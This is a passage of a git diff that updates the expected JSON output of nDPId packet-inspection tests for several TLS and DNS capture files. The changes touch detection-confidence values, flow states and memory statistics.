{"version":"TLSv1","client_requested_server_name":"ads1.msads.net","server_names":"*.vo.msecnd.net,*.officeapps.live.com,*.msads.net,*.ads2.msads.net,*.stc.s-msn.com,cdn.dc2files.*.livefilestore-int.com,cdn.*.livefilestore.com,*.marketplace.windowsmobile.com,*.marketplace.windowsmobile-int.com,*.marketplace.windowsmobile-perf.com,*.stj.s-msn.com,ajax.microsoft.com,*.microsoft-sbs-domains.com,*.live.net,*.msn.com,*.msn-int.com,*.f1ds.shared.live-int.com,*.f1ds.wlxrs-int.com,*.shared.live-int.com,*.shared.live.com,*.microsoft.com,*.live.com,*.live-int.com,*.wlxrs.com,*.wlxrs-int.com,*.st.s-msn.com,*.stb.s-msn.com,images.moxy.windowsphone-int.com,*.wlxrsu-int.com,images.partner.windowsphone-int.com,images.partner.windowsphone.com,*.jp.msn.com,*.c3scs.jp.msn.com,*.aspnetcdn.com,*.hotmail.com,*.partner-df.windowsphone-int.com,*.s-msn.com,*.live-int.net,*.windowsphone-int.com,*.windowsphone.com,*.partner-pc.windowsphone-int.com,*.manage.microsoft.com","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=Microsoft Secure Server Authority","subjectDN":"C=US, L=Redmond, O=Microsoft, OU=GFS, CN=*.officeapps.live.com, CN=*.msads.net, CN=*.ads2.msads.net, CN=*.stc.s-msn.com, CN=cdn.dc2files.*.livefilestore-int.com, CN=cdn.*.livefilestore.com, CN=*.marketplace.windowsmobile.com, CN=*.marketplace.windowsmobile-int.com, CN=*.marketplace.windowsmobile-perf.com, CN=*.stj.s-msn.com, CN=ajax.microsoft.com, CN=*.microsoft-sbs-domains.com, CN=*.live.net, CN=*.msn.com, CN=*.msn-int.com, CN=*.f1ds.shared.live-int.com, CN=*.f1ds.wlxrs-int.com, CN=*.shared.live-int.com, CN=*.shared.live.com, CN=*.microsoft.com, CN=*.live.com, CN=*.live-int.com, CN=*.wlxrs.com, CN=*.wlxrs-int.com, CN=*.st.s-msn.com, CN=*.stb.s-msn.com, CN=images.moxy.windowsphone-int.com, CN=*.wlxrsu-int.com, CN=images.partner.windowsphone-int.com, CN=images.partner.windowsphone.com, CN=*.jp.msn.com, CN=*.c3scs.jp.msn.com, CN=*.aspnetcdn.com, CN=*.hotmail.com, CN=*.partner-df.windowsphone-int.com, CN=*.s-msn.com, CN=*.live-int.net, CN=*.windowsphone-int.com, CN=*.windowsphone.com, CN=*.partner-pc.windowsphone-int.com, CN=*.manage.microsoft.com, CN=*.vo.msecnd.net","fingerprint":"FF:BF:9A:69:8F:C8:44:FF:89:F2:61:49:A7:D1:9A:98:DE:32:84:3B"}} -01024{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"}} +03323{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","server_names":"*.vo.msecnd.net,*.officeapps.live.com,*.msads.net,*.ads2.msads.net,*.stc.s-msn.com,cdn.dc2files.*.livefilestore-int.com,cdn.*.livefilestore.com,*.marketplace.windowsmobile.com,*.marketplace.windowsmobile-int.com,*.marketplace.windowsmobile-perf.com,*.stj.s-msn.com,ajax.microsoft.com,*.microsoft-sbs-domains.com,*.live.net,*.msn.com,*.msn-int.com,*.f1ds.shared.live-int.com,*.f1ds.wlxrs-int.com,*.shared.live-int.com,*.shared.live.com,*.microsoft.com,*.live.com,*.live-int.com,*.wlxrs.com,*.wlxrs-int.com,*.st.s-msn.com,*.stb.s-msn.com,images.moxy.windowsphone-int.com,*.wlxrsu-int.com,images.partner.windowsphone-int.com,images.partner.windowsphone.com,*.jp.msn.com,*.c3scs.jp.msn.com,*.aspnetcdn.com,*.hotmail.com,*.partner-df.windowsphone-int.com,*.s-msn.com,*.live-int.net,*.windowsphone-int.com,*.windowsphone.com,*.partner-pc.windowsphone-int.com,*.manage.microsoft.com","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=Microsoft Secure Server Authority","subjectDN":"C=US, L=Redmond, O=Microsoft, OU=GFS, CN=*.officeapps.live.com, CN=*.msads.net, CN=*.ads2.msads.net, CN=*.stc.s-msn.com, CN=cdn.dc2files.*.livefilestore-int.com, CN=cdn.*.livefilestore.com, CN=*.marketplace.windowsmobile.com, CN=*.marketplace.windowsmobile-int.com, CN=*.marketplace.windowsmobile-perf.com, CN=*.stj.s-msn.com, CN=ajax.microsoft.com, CN=*.microsoft-sbs-domains.com, CN=*.live.net, CN=*.msn.com, CN=*.msn-int.com, CN=*.f1ds.shared.live-int.com, CN=*.f1ds.wlxrs-int.com, CN=*.shared.live-int.com, CN=*.shared.live.com, CN=*.microsoft.com, CN=*.live.com, CN=*.live-int.com, CN=*.wlxrs.com, CN=*.wlxrs-int.com, CN=*.st.s-msn.com, CN=*.stb.s-msn.com, CN=images.moxy.windowsphone-int.com, CN=*.wlxrsu-int.com, CN=images.partner.windowsphone-int.com, CN=images.partner.windowsphone.com, CN=*.jp.msn.com, CN=*.c3scs.jp.msn.com, CN=*.aspnetcdn.com, CN=*.hotmail.com, CN=*.partner-df.windowsphone-int.com, CN=*.s-msn.com, CN=*.live-int.net, CN=*.windowsphone-int.com, CN=*.windowsphone.com, CN=*.partner-pc.windowsphone-int.com, CN=*.manage.microsoft.com, CN=*.vo.msecnd.net","fingerprint":"FF:BF:9A:69:8F:C8:44:FF:89:F2:61:49:A7:D1:9A:98:DE:32:84:3B"}} +01024{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":6881,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":946681200000} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5911370 bytes -~~ total memory freed........: 5911370 bytes -~~ total allocations/frees...: 118172/118172 +~~ total memory allocated....: 6045004 bytes +~~ total memory freed........: 6045004 bytes +~~ total allocations/frees...: 120934/120934 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 3328 chars diff --git a/test/results/tls_alert.pcap.out b/test/results/tls_alert.pcap.out index f56795792..ec2d13458 100644 --- a/test/results/tls_alert.pcap.out +++ b/test/results/tls_alert.pcap.out @@ -4,15 +4,15 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1628259176203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1628259176203,"pkt":"AICPmq69oM7IELEuCABFAABAAABAAEAGtpPAqAHAwKgBFPa2AbvtIEkOAAAAALAC\/\/9MagAAAgQFtAEDAwUBAQgKE9Ij+wAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1628259176203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1628259176203,"pkt":"oM7IELEuAICPmq69CABFAAA8AABAAEAGtpfAqAEUwKgBwAG79rbEoc1F7SBJD6AScSBz9QAAAgQFtAQCCAoAseWtE9Ij+wEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1628259176203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1628259176203,"pkt":"AICPmq69oM7IELEuCABFAAA0AABAAEAGtp\/AqAHAwKgBFPa2AbvtIEkPxKHNRoAQEBUDzQAAAQEIChPSI\/sAseWt"} -01031{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1628259176203,"flow_last_seen":1628259176204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1628259176204,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google-analytics.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01031{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1628259176203,"flow_last_seen":1628259176204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1628259176204,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google-analytics.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":12,"source":"tls_alert.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":11,"total-skipped-flows":0,"total-l4-payload-len":206,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1642662403350} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642662403350,"flow_last_seen":1642662403350,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1642662403350,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.202.202","src_port":37780,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1642662403350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1642662403350,"pkt":"eJS0JASgYDjgxTWgCABFAABHB2VAAD8GBknAqAJkoCzKypOUAbvHogbZRxwevVAYAY\/SKwAAFQMDABoAAAAAAAAAAveoY2RlTzXreZQA7uCWWlmb9Q=="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642662403350,"flow_last_seen":1642662403350,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1642662403350,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.202.202","src_port":37780,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642662403350,"flow_last_seen":1642662403350,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1642662403350,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.202.202","src_port":37780,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1642662403353,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1642662403353,"pkt":"eJS0JASgYDjgxTWgCABFAAAoB2ZAAD8GBmfAqAJkoCzKypOUAbvHogb4RxwevVARAY+2fQAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1642662403415,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1642662403415,"pkt":"eJS0JASgYDjgxTWgCABFAAAoB2dAAD8GBmbAqAJkoCzKypOUAbvHogb4RxwevVARAY+2fQAA"} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1628259176203,"flow_last_seen":1628259176206,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1642662407022,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1642662403350,"flow_last_seen":1642662407022,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1642662407022,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.202.202","src_port":37780,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1642662403350,"flow_last_seen":1642662407022,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1642662407022,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.202.202","src_port":37780,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":18,"source":"tls_alert.pcap","alias":"nDPId-test","packets-captured":18,"packets-processed":18,"total-skipped-flows":0,"total-l4-payload-len":361,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1642662407022} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 18/18 @@ -22,9 +22,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875173 bytes -~~ total memory freed........: 5875173 bytes -~~ total allocations/frees...: 118140/118140 +~~ total memory allocated....: 6008807 bytes +~~ total memory freed........: 6008807 bytes +~~ total allocations/frees...: 120902/120902 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 456 chars ~~ json string max len.......: 1036 chars diff --git a/test/results/tls_certificate_too_long.pcap.out b/test/results/tls_certificate_too_long.pcap.out index 1fce0d77d..348867331 100644 --- a/test/results/tls_certificate_too_long.pcap.out +++ b/test/results/tls_certificate_too_long.pcap.out @@ -9,137 +9,137 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1626168075586,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168075586,"pkt":"8BiYFWV86qnehSPOCABFAAA0AABAAEAGtm\/AqAGLwKgBedhHzfFqV75MQuV5fYAQD\/PHGQAAAQEICszblug90e6F"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075664,"flow_last_seen":1626168075664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168075664,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1626168075664,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168075664,"pkt":"WNVuaKQA8BiYFWV8CABFAABI5dsAAEARwpjAqAF5CAgICMwbADUANLpX5f8BAAABAAAAAAAAAzEyMQExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075664,"flow_last_seen":1626168075664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168075664,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"121.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075664,"flow_last_seen":1626168075664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168075664,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"121.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1626168075665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1626168075665,"pkt":"WNVuaKQA8BiYFWV8CABFAABHYLwAAEARR7nAqAF5CAgICMwbADUAM5mdqksBAAABAAAAAAAAAjYwAjIxAzE0OQI1Mgdpbi1hZGRyBGFycGEAAAwAAQ=="} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168075664,"flow_last_seen":1626168075665,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168075665,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"60.21.149.52.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168075664,"flow_last_seen":1626168075665,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168075665,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"60.21.149.52.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1626168075665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168075665,"pkt":"WNVuaKQA8BiYFWV8CABFAABIJLIAAEARg8LAqAF5CAgICMwbADUANFbmSGkBAAABAAAAAAAAAzEzOQExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} -00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1626168075664,"flow_last_seen":1626168075665,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168075665,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"139.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 